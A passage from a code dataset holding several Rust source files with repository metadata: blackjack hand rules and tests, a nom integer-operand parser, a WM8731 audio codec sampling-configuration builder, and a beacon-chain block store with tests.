{ match &self.player_type { PlayerType::Dealer => false, PlayerType::Player => self.hand.get_card_count() == 2, } } pub fn can_hit(&self) -> bool { match self.player_type { PlayerType::Player => match self.get_value() { Some(HandValue::V(n)) => n < 21, Some(HandValue::Ace(_, high)) => high < 21, _ => false, }, PlayerType::Dealer => match self.get_value() { Some(HandValue::V(n)) => n < 17, Some(HandValue::Ace(low, high)) => low <= 17 || high < 17, // hit on soft 17 _ => false, }, } } pub fn is_dealer(&self) -> bool { self.player_type == PlayerType::Dealer } pub fn reset(&mut self) { self.hand.reset_cards(); self.state = HandState::Default; self.result_state = ResultsState::Default; self.wager.reset_wager(); } } pub trait ResultState { fn set_result_state(&mut self, state: ResultsState); fn get_result_state(&self) -> &ResultsState; fn set_natural(&mut self) { self.set_result_state(ResultsState::Natural); } fn set_busted(&mut self) { self.set_result_state(ResultsState::Busted); } fn set_lost(&mut self) { self.set_result_state(ResultsState::Lost); } fn set_won(&mut self) { self.set_result_state(ResultsState::Won); } fn set_pushed(&mut self) { self.set_result_state(ResultsState::Pushed); } fn did_win(&self) -> bool { match self.get_result_state() { ResultsState::Won => true, ResultsState::Natural => true, _ => false, } } } impl ResultState for BlackjackHand { fn set_result_state(&mut self, state: ResultsState) { self.result_state = state; } fn get_result_state(&self) 
-> &ResultsState { &self.result_state } } impl WithWager for BlackjackHand { fn get_mut_wager(&mut self) -> &mut Wager { &mut self.wager } fn get_wager(&self) -> &Wager { &self.wager } fn set_wagered_value(&mut self, wager: u32) { self.wager.set_wager(wager); self.set_state(HandState::WagerPlaced) } } impl WithHandValue for BlackjackHand { fn get_cards(&self) -> &Vec<Arc<Card>> { self.hand.get_cards() } } #[cfg(test)] mod tests { use crate::cards::{Card, Hand, Rank, Suit}; use super::*; #[test] fn it_can_split() { let card = Arc::new(Card::from(Suit::Club, Rank::Five)); let card2 = Arc::new(Card::from(Suit::Club, Rank::Five)); let mut player = BlackjackHand::new(PlayerType::Player); let mut dealer = BlackjackHand::new(PlayerType::Dealer); player.add_card(card.clone()); player.add_card(card2.clone()); dealer.add_card(card); dealer.add_card(card2); assert!(player.can_split()); assert!(!dealer.can_split()); } #[test] fn it_does_split() { let card1 = Arc::new(Card::from(Suit::Club, Rank::Eight)); let card2 = Arc::new(Card::from(Suit::Club, Rank::Eight)); let mut hand = BlackjackHand::new(PlayerType::Player); hand.add_card(card1); hand.add_card(card2); let hands = hand.split(); assert!(hands.is_some()); let hands = hands.unwrap(); let hand1 = hands.get(0).unwrap(); let hand2 = hands.get(1).unwrap(); assert_eq!(hand1.get_card_count(), 1); assert_eq!(hand2.get_card_count(), 1); let card1 = hand1.get_cards().first().unwrap(); let card2 = hand2.get_cards().first().unwrap(); assert_eq!(card1, card2); } #[test] fn can_double_down() { let card1 = Arc::new(Card::from(Suit::Club, Rank::Five)); let card2 = Arc::new(Card::from(Suit::Club, Rank::Six)); let player = BlackjackHand::with_cards( PlayerType::Player, vec![card1.clone(), card2.clone()], ); let dealer = BlackjackHand::with_cards(PlayerType::Dealer, vec![card1, card2]); assert!(player.can_double_down()); assert!(!dealer.can_double_down()); } #[test] fn can_hit_player() { let card1 = Arc::new(Card::from(Suit::Club, Rank::Five)); let card2 = Arc::new(Card::from(Suit::Club, Rank::Seven)); let mut player = BlackjackHand::with_cards(PlayerType::Player, vec![card1, card2]); assert!(player.can_hit()); let card3 = Arc::new(Card::from(Suit::Club, Rank::King)); player.add_card(card3); assert!(!player.can_hit()); } #[test] fn can_hit_dealer() { let card1 = Arc::new(Card::from(Suit::Club, Rank::Three)); let card2 = Arc::new(Card::from(Suit::Club, Rank::Four)); let mut dealer = BlackjackHand::with_cards(PlayerType::Dealer, vec![card1, card2]); assert!(dealer.can_hit()); // 7 let card3 = Arc::new(Card::from(Suit::Club, Rank::King)); dealer.add_card(card3.clone()); assert!(!dealer.can_hit()); // 17 dealer.reset(); let card1 = Arc::new(Card::from(Suit::Club, Rank::Ace)); let card2 = Arc::new(Card::from(Suit::Club, Rank::Six)); dealer.add_cards(vec![card1, card2]); assert!(dealer.can_hit()); // soft 17 dealer.add_card(card3); assert!(!dealer.can_hit()); // hard 17 } }
true
bbe862c809525ed0b94f174f3eb20b8857fd3991
Rust
oky-123/build_your_own_x
/ProgrammingLanuage/iridium/src/assembler/integer_parsers.rs
UTF-8
859
3.1875
3
[]
no_license
use nom::digit;
use nom::types::CompleteStr;

use crate::assembler::Token;

named!(pub integer<CompleteStr, Token>,
    ws!(
        do_parse!(
            tag!("#") >>
            reg_num: digit >>
            (
                Token::IntegerOperand{value: reg_num.parse::<i32>().unwrap()}
            )
        )
    )
);

mod tests {
    #[allow(unused_imports)]
    use super::*;

    #[test]
    fn test_parse_integer() {
        // Test a valid integer operand
        let result = integer(CompleteStr("#10"));
        assert_eq!(result.is_ok(), true);
        let (rest, value) = result.unwrap();
        assert_eq!(rest, CompleteStr(""));
        assert_eq!(value, Token::IntegerOperand { value: 10 });

        // Test an invalid one (missing the #)
        let result = integer(CompleteStr("10"));
        assert_eq!(result.is_ok(), false);
    }
}
true
fbbdb0697c554df31d4b931a8d1a6a7f81cc2d97
Rust
YruamaLairba/wm8731-alt
/src/command/sampling.rs
UTF-8
22,809
3.234375
3
[ "MIT" ]
permissive
//! Command builder for sampling configuration. //! //! This module offer two style for building a command, a nice style using a master clock and a raw //! style allowing more advance use. //! //! # Style with master clock //! With this method, the builder is instantiated with a marker to indicate the internal master clock //! frequency. Valid markers are : //! - `Mclk12M288` for a 12.288 MHz master clock //! - `Mclk18M432` for a 18.432 MHz master clock //! - `Mclk11M2896` for a 11.2896 MHz master clock //! - `Mclk16M9344` for a 16.9344 MHz master clock //! - `Mclk12M` for a 12MHz master clock, correspond to USB mode. //! //! You also don't write directly to USB/NORMAL, BOSR, or SR fields. Instead, you use a *virtual* //! SampleRate field that do it for you. //! //! ## Example //! ``` //! # use wm8731_alt::command::sampling::*; //! //instantiate the builder //! let cmd = sampling_with_mclk(Mclk12M288); //! //setup the sampling rate //! let cmd = cmd.sample_rate().adc48k_dac48k(); //! //build the command //! let cmd = cmd.into_command(); //! ``` //! //! # Raw style //! With this method, you write directly to USB/NORMAL, BOSR, and SR fields. This way is useful for //! case not handled by the other method. Notably, the Sr field writer don't have very meaningful //! method name, because same combination of USB/NORMAL, BOSR, and SR can produce different //! sampling rate by just changing the master clock. Look the //! [WAN0117](https://statics.cirrus.com/pubs/appNote/WAN0117.pdf) application notice for //! advanced sampling rate selection. //! //! ## Example //! ``` //! # use wm8731_alt::command::sampling::*; //! //instantiate the builder //! let cmd = sampling(); //! //normal mode operation //! let cmd = cmd.usb_normal().normal(); //! //write bosr bit //! let cmd = cmd.bosr().clear_bit(); //! //write sr field //! let cmd = cmd.sr().sr_0b0000(); //! //build the command //! let cmd = cmd.into_command(); //! ``` //! //! # Safety and coherence //! To guarantee safety and coherence, some manipulation are enforced or prohibited. //! //! When indicating a Master clock: //! - `sample_rate` need to be set explicitly. //! - available sample rate is Master Clock dependent. //! //! With the raw method: //! - if `usb_normal` or `bosr` are written, `sr` is invalidated and need to be rewritten. //! - available `sr` setting depends on `usb_normal` and `bosr` setting. //! //! ## Example of bad usage //! Following example show incorrect usage and should not compile. //! ``` //! # #[cfg(any())] //avoid some compilation error when testing doc //! # { //! # use wm8731_alt::command::sampling::*; //! //error, sample rate require to be explicitly set //! let cmd = sampling_with_mclk(Mclk12M288).into_command(); //! //error, this sampling rate setup is impossible with the current master clock //! let cmd = sampling_with_mclk(Mclk12M288).sample_rate().adc44k1_dac44k1(); //! //error, change USB/Normal invalidate SR. //! let cmd = sampling().usb_normal().usb().into_command(); //! //error, change BOSR invalidate SR. //! let cmd = sampling().bosr().clear_bit().into_command(); //! //error, USB/NORMAL, BOSR, SR combination is invalid //! let cmd = //! sampling().usb_normal().usb().bosr().set_bit().sr().sr_0b0000(); //! # } //! ``` //! //! #![allow(clippy::new_without_default)] use crate::Command; use core::marker::PhantomData; pub mod state_marker { //! Markers to track state of the sampling builder. //! //! They are used with the sampling builder to provide coherent API and compile time safety check. 
/// Marker used to indicate Normal mode. pub struct Normal; /// Marker used to indicate USB mode. pub struct Usb; /// Marker used to indicate BOSR bit is set. pub struct BosrSet; /// Marker used to indicate BOSR bit is clear. pub struct BosrClear; /// Marker used to indicate Sr or SampleRate is valid. pub struct SrValid; /// Marker used to indicate Sr or SampleRate is not valid. /// /// `Sampling` configuration marked with this can not produce a command. pub struct SrInvalid; } use state_marker::*; /// Builder for sampling command. #[derive(Debug, Eq, PartialEq)] pub struct Sampling<T> { data: u16, t: PhantomData<T>, } impl<T> Copy for Sampling<T> {} impl<T> Clone for Sampling<T> { fn clone(&self) -> Self { *self } } //common to both method it's always safe to manipulate those fields impl<T> Sampling<T> { pub fn clkidiv2(self) -> Clkidiv2<T> { Clkidiv2 { cmd: self } } pub fn clkodiv2(self) -> Clkodiv2<T> { Clkodiv2 { cmd: self } } } ///Marker indicating use of 12.288Mhz internal master clock (normal mode). pub struct Mclk12M288; impl Mclk for Mclk12M288 {} ///Marker indicating use of 18.432Mhz internal master clock (normal mode). pub struct Mclk18M432; impl Mclk for Mclk18M432 {} ///Marker indicating use of 11.2896Mhz internal master clock (normal mode). pub struct Mclk11M2896; impl Mclk for Mclk11M2896 {} ///Marker indicating use of 16.9344Mhz internal master clock (normal mode). pub struct Mclk16M9344; impl Mclk for Mclk16M9344 {} ///Marker indicating use of 12Mhz internal master clock (USB mode). pub struct Mclk12M; impl Mclk for Mclk12M {} /// Marker trait to say a marker correspond to a master clock value. pub trait Mclk {} /// Instantiate a command builder to set sampling configuration for a particular master clock. pub fn sampling_with_mclk<MCLK>(_: MCLK) -> Sampling<(MCLK, SrInvalid)> where MCLK: Mclk, { Sampling::<(MCLK, SrInvalid)> { data: 0b1000 << 9, t: PhantomData::<(MCLK, SrInvalid)>, } } impl<MCLK, SR> Sampling<(MCLK, SR)> where MCLK: Mclk, { pub fn sample_rate(self) -> SampleRate<(MCLK, SR)> { SampleRate::<(MCLK, SR)> { cmd: self } } } /// Virtual field writer for more meaningful sampling rate setting. /// /// This actually write USB/NORMAL, BOSR, and SR fields. pub struct SampleRate<T> { cmd: Sampling<T>, } impl<MCLK, SR> SampleRate<(MCLK, SR)> { unsafe fn bits(mut self, value: u8) -> Sampling<(MCLK, SrValid)> { let mask = !((!0) << 6); self.cmd.data = self.cmd.data & !mask | (value as u16) << 2 & mask; Sampling::<(MCLK, SrValid)> { data: self.cmd.data, t: PhantomData::<(MCLK, SrValid)>, } } } impl<SR> SampleRate<(Mclk12M288, SR)> { ///Set 48khz sampling rate for ADC and DAC. #[must_use] pub fn adc48k_dac48k(self) -> Sampling<(Mclk12M288, SrValid)> { unsafe { self.bits(0b000000) } } ///Set sampling rate of 48khz for ADC and 8khz for DAC. #[must_use] pub fn adc48k_dac8k(self) -> Sampling<(Mclk12M288, SrValid)> { unsafe { self.bits(0b000100) } } ///Set sampling rate of 8khz for ADC and 48khz for DAC. #[must_use] pub fn adc8k_dac48k(self) -> Sampling<(Mclk12M288, SrValid)> { unsafe { self.bits(0b001000) } } ///Set 8khz sampling rate for ADC and DAC. #[must_use] pub fn adc8k_dac8k(self) -> Sampling<(Mclk12M288, SrValid)> { unsafe { self.bits(0b001100) } } ///Set 32khz sampling rate for ADC and DAC. #[must_use] pub fn adc32k_dac32k(self) -> Sampling<(Mclk12M288, SrValid)> { unsafe { self.bits(0b011000) } } ///Set 96khz sampling rate for ADC and DAC. 
#[must_use] pub fn adc96k_dac96k(self) -> Sampling<(Mclk12M288, SrValid)> { unsafe { self.bits(0b011100) } } } impl<SR> SampleRate<(Mclk18M432, SR)> { ///Set 48khz sampling rate for ADC and DAC. #[must_use] pub fn adc48k_dac48k(self) -> Sampling<(Mclk18M432, SrValid)> { unsafe { self.bits(0b000010) } } ///Set sampling rate of 48khz for ADC and 8khz for DAC. #[must_use] pub fn adc48k_dac8k(self) -> Sampling<(Mclk18M432, SrValid)> { unsafe { self.bits(0b000110) } } ///Set sampling rate of 8khz for ADC and 48khz for DAC. #[must_use] pub fn adc8k_dac48k(self) -> Sampling<(Mclk18M432, SrValid)> { unsafe { self.bits(0b001010) } } ///Set 8khz sampling rate for ADC and DAC. #[must_use] pub fn adc8k_dac8k(self) -> Sampling<(Mclk18M432, SrValid)> { unsafe { self.bits(0b001110) } } ///Set 32khz sampling rate for ADC and DAC. #[must_use] pub fn adc32k_dac32k(self) -> Sampling<(Mclk18M432, SrValid)> { unsafe { self.bits(0b011010) } } ///Set 96khz sampling rate for ADC and DAC. #[must_use] pub fn adc96k_dac96k(self) -> Sampling<(Mclk18M432, SrValid)> { unsafe { self.bits(0b011110) } } } impl<SR> SampleRate<(Mclk11M2896, SR)> { ///Set 44.1khz sampling rate for ADC and DAC. #[must_use] pub fn adc44k1_dac44k1(self) -> Sampling<(Mclk11M2896, SrValid)> { unsafe { self.bits(0b100000) } } ///Set sampling rate of 44.1khz for ADC and approximatively 8khz for DAC. /// ///The actual DAC sampling rate is 8.018kHz #[must_use] pub fn adc44k1_dac8k(self) -> Sampling<(Mclk11M2896, SrValid)> { unsafe { self.bits(0b100100) } } ///Set sampling rate of approximatively 8khz for ADC and 44.1khz for DAC. /// ///The actual ADC sampling rate is 8.018kHz #[must_use] pub fn adc8k_dac44k1(self) -> Sampling<(Mclk11M2896, SrValid)> { unsafe { self.bits(0b101000) } } ///Set approximatively 8khz sampling rate for ADC and DAC. /// ///The actual sampling rate is 8.018kHz #[must_use] pub fn adc8k_dac8k(self) -> Sampling<(Mclk11M2896, SrValid)> { unsafe { self.bits(0b101100) } } ///Set 88.2khz sampling rate for ADC and DAC. #[must_use] pub fn adc88k2_dac88k2(self) -> Sampling<(Mclk11M2896, SrValid)> { unsafe { self.bits(0b111100) } } } impl<SR> SampleRate<(Mclk16M9344, SR)> { ///Set 44.1khz sampling rate for ADC and DAC. #[must_use] pub fn adc44k1_dac44k1(self) -> Sampling<(Mclk16M9344, SrValid)> { unsafe { self.bits(0b100010) } } ///Set sampling rate of 44.1khz for ADC and approximatively 8khz for DAC. /// ///The actual DAC sampling rate is 8.018kHz #[must_use] pub fn adc44k1_dac8k(self) -> Sampling<(Mclk16M9344, SrValid)> { unsafe { self.bits(0b100110) } } ///Set sampling rate of approximatively 8khz for ADC and 44.1khz for DAC. /// ///The actual ADC sampling rate is 8.018kHz #[must_use] pub fn adc8k_dac44k1(self) -> Sampling<(Mclk16M9344, SrValid)> { unsafe { self.bits(0b101010) } } ///Set approximatively 8khz sampling rate for ADC and DAC. /// ///The actual sampling rate is 8.018kHz #[must_use] pub fn adc8k_dac8k(self) -> Sampling<(Mclk16M9344, SrValid)> { unsafe { self.bits(0b101110) } } ///Set 88.2khz sampling rate for ADC and DAC. #[must_use] pub fn adc88k2_dac88k2(self) -> Sampling<(Mclk16M9344, SrValid)> { unsafe { self.bits(0b111110) } } } impl<SR> SampleRate<(Mclk12M, SR)> { ///Set 48khz sampling rate for ADC and DAC. #[must_use] pub fn adc48k_dac48k(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b000001) } } ///Set approximatively 44.1khz sampling rate for ADC and DAC. /// ///The actual sampling rate is 44.118kHz. 
#[must_use] pub fn adc44k1_dac44k1(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b100011) } } ///Set sampling rate of 48khz for ADC and 8khz for DAC. #[must_use] pub fn adc48k_dac8k(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b000101) } } ///Set sampling rate of approximatively 44.1khz for ADC and approximatively 8khz for DAC. /// ///The actual sampling rate are 44.118kHz for the ADC and 8.021kHz for the DAC. #[must_use] pub fn adc44k1_dac8k(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b100111) } } ///Set sampling rate of 8khz for ADC and 48khz for DAC. #[must_use] pub fn adc8k_dac48k(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b001001) } } ///Set sampling rate of approximatively 8khz for ADC and approximatively 44.1khz for DAC. /// ///The actual sampling rate are 8.021kHz for the ADC and 44.118kHz for the DAC. #[must_use] pub fn adc8k_dac44k1(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b101011) } } ///Set 8khz sampling rate for ADC and DAC. #[must_use] pub fn adc8k_dac8k(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b001101) } } ///Set approximatively 8khz sampling rate for ADC and DAC. /// ///The actual sampling rate is 8.021kHz. #[must_use] pub fn adc8k_dac8k_bis(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b101111) } } ///Set 32khz sampling rate for ADC and DAC. #[must_use] pub fn adc32k_dac32k(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b011001) } } ///Set 96khz sampling rate for ADC and DAC. #[must_use] pub fn adc96k_dac96k(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b011101) } } ///Set approximatively 88.2kHz sampling rate for ADC and DAC. /// ///The actual sampling rate is 88.235kHz. #[must_use] pub fn adc88k2_dac88k2(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b111111) } } } //Once SampleRate have been explicitly set, a valid command can be instantiated impl<MCLK> Sampling<(MCLK, SrValid)> { /// Instanciate a command pub fn into_command(self) -> Command<()> { Command::<()> { data: self.data, t: PhantomData::<()>, } } } /// Instanciate a command builder for sampling configuration. pub fn sampling() -> Sampling<(Normal, BosrClear, SrValid)> { Sampling::<(Normal, BosrClear, SrValid)>::new() } impl Sampling<(Normal, BosrClear, SrValid)> { #[allow(clippy::identity_op)] fn new() -> Self { Self { data: 0b1000 << 9 | 0b0000_0000, t: PhantomData::<(Normal, BosrClear, SrValid)>, } } } //Once sr have been explicitly set, a valid command can be instantiated impl<MODE, BOSR> Sampling<(MODE, BOSR, SrValid)> { /// Instanciate a command pub fn into_command(self) -> Command<()> { Command::<()> { data: self.data, t: PhantomData::<()>, } } } //field accessible in raw mode impl<MODE, BOSR, SR> Sampling<(MODE, BOSR, SR)> { pub fn usb_normal(self) -> UsbNormal<(MODE, BOSR, SR)> { UsbNormal { cmd: self } } pub fn bosr(self) -> Bosr<(MODE, BOSR, SR)> { Bosr { cmd: self } } pub fn sr(self) -> Sr<(MODE, BOSR, SR)> { Sr { cmd: self } } } /// Field writer. Allow to select USB or Normal mode. Invalidate `Sr` field. 
pub struct UsbNormal<T> { cmd: Sampling<T>, } impl<MODE, BOSR, SR> UsbNormal<(MODE, BOSR, SR)> { #[must_use] pub fn clear_bit(mut self) -> Sampling<(Normal, BOSR, SrInvalid)> { self.cmd.data &= !(0b1 << 0); Sampling::<(Normal, BOSR, SrInvalid)> { data: self.cmd.data, t: PhantomData::<(Normal, BOSR, SrInvalid)>, } } #[must_use] pub fn set_bit(mut self) -> Sampling<(Usb, BOSR, SrInvalid)> { self.cmd.data |= 0b1 << 0; Sampling::<(Usb, BOSR, SrInvalid)> { data: self.cmd.data, t: PhantomData::<(Usb, BOSR, SrInvalid)>, } } #[must_use] pub fn normal(mut self) -> Sampling<(Normal, BOSR, SrInvalid)> { self.cmd.data &= !(0b1 << 0); Sampling::<(Normal, BOSR, SrInvalid)> { data: self.cmd.data, t: PhantomData::<(Normal, BOSR, SrInvalid)>, } } #[must_use] pub fn usb(mut self) -> Sampling<(Usb, BOSR, SrInvalid)> { self.cmd.data |= 0b1 << 0; Sampling::<(Usb, BOSR, SrInvalid)> { data: self.cmd.data, t: PhantomData::<(Usb, BOSR, SrInvalid)>, } } } /// Field writer. Select the Base Over-Sampling Rate. Invalidate `Sr` field. pub struct Bosr<T> { cmd: Sampling<T>, } impl<MODE, BOSR, SR> Bosr<(MODE, BOSR, SR)> { #[must_use] pub fn clear_bit(mut self) -> Sampling<(MODE, BosrClear, SrInvalid)> { self.cmd.data &= !(0b1 << 1); Sampling::<(MODE, BosrClear, SrInvalid)> { data: self.cmd.data, t: PhantomData::<(MODE, BosrClear, SrInvalid)>, } } #[must_use] pub fn set_bit(mut self) -> Sampling<(MODE, BosrSet, SrInvalid)> { self.cmd.data |= 0b1 << 1; Sampling::<(MODE, BosrSet, SrInvalid)> { data: self.cmd.data, t: PhantomData::<(MODE, BosrSet, SrInvalid)>, } } } /// Field writer. Allow to write raw bits into the sr field. pub struct Sr<T> { cmd: Sampling<T>, } impl<MODE, BOSR, SR> Sr<(MODE, BOSR, SR)> { //impl_bits!(unsafe, Sampling<T>, 4, 2); /// Set the field with raw bits. /// /// # Safety /// /// This is unsafe because it assume valid bits combination that may actually not. Please read /// the datasheet to know what are the valid combinations. 
pub unsafe fn bits(mut self, value: u8) -> Sampling<(MODE, BOSR, SrValid)> { let mask = !((!0) << 4) << 2; self.cmd.data = self.cmd.data & !mask | (value as u16) << 2 & mask; Sampling::<(MODE, BOSR, SrValid)> { data: self.cmd.data, t: PhantomData::<(MODE, BOSR, SrValid)>, } } } impl<BOSR, SR> Sr<(Normal, BOSR, SR)> { #[must_use] pub fn sr_0b0000(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b0000) } } #[must_use] pub fn sr_0b0001(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b0001) } } #[must_use] pub fn sr_0b0010(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b0010) } } #[must_use] pub fn sr_0b0011(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b0011) } } #[must_use] pub fn sr_0b0110(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b0110) } } #[must_use] pub fn sr_0b0111(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b0111) } } #[must_use] pub fn sr_0b1000(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b1000) } } #[must_use] pub fn sr_0b1001(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b1001) } } #[must_use] pub fn sr_0b1010(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b1010) } } #[must_use] pub fn sr_0b1011(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b1011) } } #[must_use] pub fn sr_0b1111(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b1111) } } } impl<SR> Sr<(Usb, BosrClear, SR)> { #[must_use] pub fn sr_0b0000(self) -> Sampling<(Usb, BosrClear, SrValid)> { unsafe { self.bits(0b0000) } } #[must_use] pub fn sr_0b0001(self) -> Sampling<(Usb, BosrClear, SrValid)> { unsafe { self.bits(0b0001) } } #[must_use] pub fn sr_0b0010(self) -> Sampling<(Usb, BosrClear, SrValid)> { unsafe { self.bits(0b0010) } } #[must_use] pub fn sr_0b0011(self) -> Sampling<(Usb, BosrClear, SrValid)> { unsafe { self.bits(0b0011) } } #[must_use] pub fn sr_0b0110(self) -> Sampling<(Usb, BosrClear, SrValid)> { unsafe { self.bits(0b0110) } } #[must_use] pub fn sr_0b0111(self) -> Sampling<(Usb, BosrClear, SrValid)> { unsafe { self.bits(0b0111) } } } impl<SR> Sr<(Usb, BosrSet, SR)> { #[must_use] pub fn sr_0b1000(self) -> Sampling<(Usb, BosrSet, SrValid)> { unsafe { self.bits(0b1000) } } #[must_use] pub fn sr_0b1001(self) -> Sampling<(Usb, BosrSet, SrValid)> { unsafe { self.bits(0b1001) } } #[must_use] pub fn sr_0b1010(self) -> Sampling<(Usb, BosrSet, SrValid)> { unsafe { self.bits(0b1010) } } #[must_use] pub fn sr_0b1011(self) -> Sampling<(Usb, BosrSet, SrValid)> { unsafe { self.bits(0b1011) } } #[must_use] pub fn sr_0b1111(self) -> Sampling<(Usb, BosrSet, SrValid)> { unsafe { self.bits(0b1111) } } } impl_toggle_writer!(Clkidiv2<T>, Sampling<T>, 6); impl_toggle_writer!(Clkodiv2<T>, Sampling<T>, 7); #[cfg(test)] mod tests { use super::*; // all() to compile, any() to not compile #[cfg(all())] fn _should_compile() { let _ = sampling_with_mclk(Mclk12M288) .sample_rate() .adc48k_dac48k() .into_command(); let new_cmd = sampling(); //default is valid new_cmd.into_command(); //setting sr from default is valid new_cmd.sr().sr_0b0000().into_command(); } // all() to compile, any() to not compile #[cfg(any())] fn _should_compile_warn() { let new_cmd = sampling(); //should warn, you may think you change the command but this is not the case new_cmd.usb_normal().normal(); let cmd = sampling_with_mclk(Mclk12M288); //should warn, you may think you change the command but this is not the case cmd.sample_rate().adc48k_dac48k(); } // all() 
to compile, any() to not compile #[cfg(any())] fn _should_compile_error() { //error, when specifying mclk, Sampling rate default value is undefined. sampling_with_mclk(Mclk11M2896).into_command(); //error, invalid combinations of clock and sample rate. sampling_with_mclk(Mclk11M2896) .sample_rate() .adc48k_dac48k(); sampling_with_mclk(Mclk16M9344) .sample_rate() .adc96k_dac96k(); sampling_with_mclk(Mclk12M288) .sample_rate() .adc44k1_dac44k1(); sampling_with_mclk(Mclk18M432) .sample_rate() .adc88k1_dac88k1(); let new_cmd = sampling(); //error, can't build the command, setting USB/Normal invalidate sr. let _ = new_cmd.usb_normal().normal().into_command(); //error, can't build the command, setting BOSR invalidate sr. let _ = new_cmd.bosr().clear_bit().into_command(); //error, cannot set this sr value with this bosr value let _ = new_cmd .usb_normal() .usb() .bosr() .clear_bit() .sr() .sr_0b1111(); //error, cannot set this sr value with this bosr value let _ = new_cmd.usb_normal().usb().bosr().set_bit().sr().sr_0b0000(); } }
true
0089bd058d57d1551f2b161364544098976aa9f4
Rust
mluluz/lighthouse
/beacon_node/db/src/stores/beacon_block_store.rs
UTF-8
7,951
3.046875
3
[ "Apache-2.0" ]
permissive
use super::BLOCKS_DB_COLUMN as DB_COLUMN;
use super::{ClientDB, DBError};
use ssz::Decodable;
use std::sync::Arc;
use types::{BeaconBlock, Hash256, Slot};

#[derive(Clone, Debug, PartialEq)]
pub enum BeaconBlockAtSlotError {
    UnknownBeaconBlock(Hash256),
    InvalidBeaconBlock(Hash256),
    DBError(String),
}

pub struct BeaconBlockStore<T>
where
    T: ClientDB,
{
    db: Arc<T>,
}

// Implements `put`, `get`, `exists` and `delete` for the store.
impl_crud_for_store!(BeaconBlockStore, DB_COLUMN);

impl<T: ClientDB> BeaconBlockStore<T> {
    pub fn new(db: Arc<T>) -> Self {
        Self { db }
    }

    pub fn get_deserialized(&self, hash: &Hash256) -> Result<Option<BeaconBlock>, DBError> {
        match self.get(&hash)? {
            None => Ok(None),
            Some(ssz) => {
                let (block, _) = BeaconBlock::ssz_decode(&ssz, 0).map_err(|_| DBError {
                    message: "Bad BeaconBlock SSZ.".to_string(),
                })?;
                Ok(Some(block))
            }
        }
    }

    /// Retrieve the block at a slot given a "head_hash" and a slot.
    ///
    /// A "head_hash" must be a block hash with a slot number greater than or equal to the desired
    /// slot.
    ///
    /// This function will read each block down the chain until it finds a block with the given
    /// slot number. If the slot is skipped, the function will return None.
    ///
    /// If a block is found, a tuple of (block_hash, serialized_block) is returned.
    ///
    /// Note: this function uses a loop instead of recursion as the compiler is over-strict when it
    /// comes to recursion and the `impl Trait` pattern. See:
    /// https://stackoverflow.com/questions/54032940/using-impl-trait-in-a-recursive-function
    pub fn block_at_slot(
        &self,
        head_hash: &Hash256,
        slot: Slot,
    ) -> Result<Option<(Hash256, BeaconBlock)>, BeaconBlockAtSlotError> {
        let mut current_hash = *head_hash;
        loop {
            if let Some(block) = self.get_deserialized(&current_hash)? {
                if block.slot == slot {
                    break Ok(Some((current_hash, block)));
                } else if block.slot < slot {
                    break Ok(None);
                } else {
                    current_hash = block.previous_block_root;
                }
            } else {
                break Err(BeaconBlockAtSlotError::UnknownBeaconBlock(current_hash));
            }
        }
    }
}

impl From<DBError> for BeaconBlockAtSlotError {
    fn from(e: DBError) -> Self {
        BeaconBlockAtSlotError::DBError(e.message)
    }
}

#[cfg(test)]
mod tests {
    use super::super::super::MemoryDB;
    use super::*;

    use std::sync::Arc;
    use std::thread;

    use ssz::ssz_encode;
    use types::test_utils::{SeedableRng, TestRandom, XorShiftRng};
    use types::BeaconBlock;
    use types::Hash256;

    test_crud_for_store!(BeaconBlockStore, DB_COLUMN);

    #[test]
    fn head_hash_slot_too_low() {
        let db = Arc::new(MemoryDB::open());
        let bs = Arc::new(BeaconBlockStore::new(db.clone()));
        let mut rng = XorShiftRng::from_seed([42; 16]);

        let mut block = BeaconBlock::random_for_test(&mut rng);
        block.slot = Slot::from(10_u64);
        let block_root = block.canonical_root();
        bs.put(&block_root, &ssz_encode(&block)).unwrap();

        let result = bs.block_at_slot(&block_root, Slot::from(11_u64)).unwrap();
        assert_eq!(result, None);
    }

    #[test]
    fn test_invalid_block_at_slot() {
        let db = Arc::new(MemoryDB::open());
        let store = BeaconBlockStore::new(db.clone());

        let ssz = "definitly not a valid block".as_bytes();
        let hash = &Hash256::from([0xAA; 32]);

        db.put(DB_COLUMN, hash.as_bytes(), ssz).unwrap();
        assert_eq!(
            store.block_at_slot(hash, Slot::from(42_u64)),
            Err(BeaconBlockAtSlotError::DBError(
                "Bad BeaconBlock SSZ.".into()
            ))
        );
    }

    #[test]
    fn test_unknown_block_at_slot() {
        let db = Arc::new(MemoryDB::open());
        let store = BeaconBlockStore::new(db.clone());

        let ssz = "some bytes".as_bytes();
        let hash = &Hash256::from([0xAA; 32]);
        let other_hash = &Hash256::from([0xBB; 32]);

        db.put(DB_COLUMN, hash.as_bytes(), ssz).unwrap();
        assert_eq!(
            store.block_at_slot(other_hash, Slot::from(42_u64)),
            Err(BeaconBlockAtSlotError::UnknownBeaconBlock(*other_hash))
        );
    }

    #[test]
    fn test_block_store_on_memory_db() {
        let db = Arc::new(MemoryDB::open());
        let bs = Arc::new(BeaconBlockStore::new(db.clone()));

